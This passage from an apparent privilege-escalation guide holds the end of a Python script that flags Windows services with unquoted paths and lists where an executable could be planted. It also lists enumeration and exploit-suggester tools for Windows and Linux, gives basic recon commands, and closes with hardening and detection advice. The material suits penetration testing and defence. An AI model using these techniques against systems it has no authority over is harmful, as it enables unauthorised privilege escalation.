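    icacls; C:\\ and C:\\Program Files are not writable by standard users."""
    candidates = candidate_executables(image_path)
    return [(c, ntpath.dirname(c)) for c in candidates[:-1]]


if __name__ == "__main__":
    # Constructed sample: the paths from the unquoted-path exercise above.
    for path in [r"C:\Program Files\Vulnerable Service\app.exe",
                 r"C:\Custom Apps\My Service\bin\service.exe",
                 r'"C:\Program Files\Safe Service\app.exe"',
                 r"C:\Windows\System32\svchost.exe"]:
        print("VULNERABLE" if is_vulnerable(path) else "ok        ", path)
        for planted, directory in hijack_points(path):
            print(f"    plant {planted}  (needs write access to {directory})")
```

Feed it the PathName column from the wmic or Get-WmiObject query to triage every service at once; a service is only exploitable when one of the listed directories is writable and you can restart the service or wait for a reboot.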
Comprehensive reference for automated enumeration and exploitation tools.
Windows:
• Automated Windows enumeration script that checks for common privilege escalation vectors. Part of the PEASS-ng suite; outputs color-coded findings.
• PowerShell script for Windows privilege escalation enumeration.
• Compares system patch level against the Microsoft vulnerability database.
• C# project for offensive security host survey and situational awareness.
• Post-exploitation tool to check common Windows misconfigurations.
• Enumerates missing KBs and suggests exploits for privilege escalation.
• Tool to find DLL hijacking opportunities.
Linux:
• Automated Linux/Unix enumeration script.
• Python script to enumerate system configuration and identify privilege escalation vectors.
• Suggests kernel exploits based on operating system version.
• Shell script to check for common privilege escalation vectors.
• Unprivileged Linux process snooping to detect cron jobs and other periodic activity.
• Manual enumeration commands for finding exploitable binaries.
Cross-platform:
• Cross-platform privilege escalation suite (WinPEAS, LinPEAS, MacPEAS) supporting Windows, Linux, and macOS with color-coded output:
git clone https://github.com/carlospolop/PEASS-ng.git
• Available for Windows, Linux, and macOS.
• Automated exploit suggestion based on the active session.
Essential commands to run on any system.
System information:
# Windows
systeminfo
whoami /all
# Linux
uname -a
id
cat /etc/os-release
Network information:
# Windows
ipconfig /all
netstat -ano
# Linux
ifconfig
netstat -tulpn
Implement these security measures to prevent privilege escalation attacks.
Regularly apply security patches and updates for OS and applications
Users and services should operate with minimal required permissions
Implement MFA for all administrative accounts
Use AppLocker or similar to control executable execution
Enable comprehensive logging and monitor for suspicious activity
Ensure all service paths with spaces are properly quoted
Set AlwaysInstallElevated to 0 (or remove the value) under both HKLM and HKCU; the policy only takes effect when both are 1
Enable SafeDllSearchMode and use fully qualified paths
Audit tasks for proper permissions and secure script locations
Minimize SeImpersonate and other dangerous privileges
Delete unattend.xml and similar files containing credentials
Regularly review and remove unnecessary SUID/SGID permissions
Use specific command paths, avoid NOPASSWD where possible
Ensure cron job files and the scripts they run are owned by root and not group- or world-writable (644 for crontab entries, 755 or 700 for scripts), and that their directories are not writable either
Keep kernel updated to patch privilege escalation vulnerabilities
Use absolute paths in scripts, restrict PATH modifications
Audit and minimize Linux capabilities on binaries
Use mandatory access control systems (SELinux, AppArmor)
Follow Center for Internet Security (CIS) benchmarks and DISA Security Technical Implementation Guides (STIGs) for hardened baseline configurations.
Implement detection for the techniques above, for example alerting on new SUID binaries, changed sudoers rules, modified service image paths and new scheduled tasks or cron jobs.